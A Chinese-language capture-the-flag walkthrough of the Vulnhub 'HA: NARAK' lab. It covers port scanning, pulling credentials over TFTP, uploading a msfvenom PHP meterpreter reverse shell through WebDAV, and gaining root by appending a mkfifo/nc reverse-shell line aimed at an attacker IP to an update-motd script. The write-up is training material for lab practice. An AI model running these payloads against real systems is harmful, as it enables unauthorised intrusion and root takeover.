前言:
Vulnhub是一个提供各种漏洞环境的靶场,每个镜像会有破解的目标,挑战的目标是通过网络闯入系统获取root权限和查看flag
说明:这次选择的靶场名字为:HA: NARAK
靶场下载链接:https://download.vulnhub.com/ha/narak.ova
个人建议在vmware运行靶场环境,再使用kali或者终端机器作为攻击主机,同时要注意kali在同一网卡下,否则是无法进行通信的。
题目的描述为:
为了让更多新手朋友少走弯路,我尽量写详细一点,如果有什么不清楚的地方可以对我们发起提问
开始:
在这里我让kali和靶场都使用NAT模式
在编辑->虚拟网络编辑器处可以看到我们使用模式的配置。
Ip地址段都为192.168.158.*
目标主机:未知ip
既然知道ip段,不知道IP,我们可与使用nmap去扫描整个 c段来探测主机
使用命令:Nmap -sS -Pn 192.168.158.0/24
发现192.168.158.142开放了80和22
那我们所需要渗透的靶场就为192.168.158.142了
虽然使用 nmap -sS -Pn ip这个扫描会虽然速度很快,不过很多端口会扫描不出来
我们可以使用命令:nmap -T4 -A -v-p 1-65535 ip去详细对目标扫描一下
使用udp进行端口扫描,命令:nmap-sU -Pn 192.168.158.142
一共开放了4个端口,80端口的web,22端口的ssh,69的tftp和68的dhcpc
其中80开放http服务
我们先访问一下80吧
使用google的wappalyzer插件查看一下是否有框架信息
并没有得到网站开发的框架,但可以知道网站的apche的版本和ubuntu的操作系统
这时我们可以对目标进行目录扫描:
先使用dirscan进行扫描
访问/webdav
由于我们没有账号信息,想要爆破起来比较困难,我们对目标继续信息收集。
使用7kbscan对目标扫描其他的扩展
最终在找到一个txt文件
访问一下
提示我们关键的文件在creds.txt里
看来我们需要找到creads.txt文件,但是扫描都没发现这个文件
猜测可能是存在tftp中的
我们开启一下tftp服务(控制面板->程序->启动或者关闭window功能)
使用cmd
使用命令:tftp -i 192.168.158.142 get creds.txt 果然存在
打开发现是一串base64
解密一下
解密得到为:yamdoot:Swarg
这应该就是webdav的账号和密码了
成功连接
可以发现我们是可以通过webdav上传文件的
接着我们使用kali的cadaver去连接webdav
使用命令:cadaver http://192.168.158.142/webdav
由于这里是需要登录webdav所以我们需要上传能反弹shell的木马文件
这里使用kali生成一个msf的php马,命令:
msfvenom -pphp/meterpreter_reverse_tcp LHOST=xxx LPORT=xxx -f raw > shell.php
kali进行监听
命令:
use exploit/multi/handler
set payloadphp/meterpreter_reverse_tcp
php/meterpreter_reverse_tcp
set lhost 192.168.158.132
192.168.158.132
set lport 8888
run
再上传生成的木马文件
访问msf.php
成功拿到meterperter
权限比较低
查看内核
使用searchsploit查看是否有可以提权的脚本
没有发现利用的脚本,看来提权得翻文件了
在/home/inferno目录中找到了user.txt
在home目录中可以发现还存在2个用户
我们还需要找到root.txt,这个文件估计需要我们提权了
Yamdoot应该是TFPT用户,narak我们访问不了,应该为高权限账号
继续翻文件
在/mnt目录发现一段密文
百度可以得到为brainfuck
使用brainfuck在线解密
得到chitragupt,感觉可能是某个账号的密码
我们对3个账号进行尝试
使用inferno/chitragupt登录成功
接着我们可以上传linpeas来查找可供我们提权的文件
/etc/motd欢迎界面 我们可以通过修改ssh登陆时的欢迎信息来反弹一个root的shell使用命令echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i2>&1|nc 192.168.158.132 1234 >/tmp/f” >>/etc/update-motd.d/00-header
接着kali使用nc监听
重新登录
Nc成功接收到root
最后cat ./root.txt得到最终的flag
总结:
Vulnhub还是挺有意思的,能够掌握很多渗透的技巧,我们后续我们会继续更新新的靶场文章,希望能给大家一点帮助。
来源:freebuf.com 2020-11-06 11:30:30 by: Jdicsp
请登录后发表评论
注册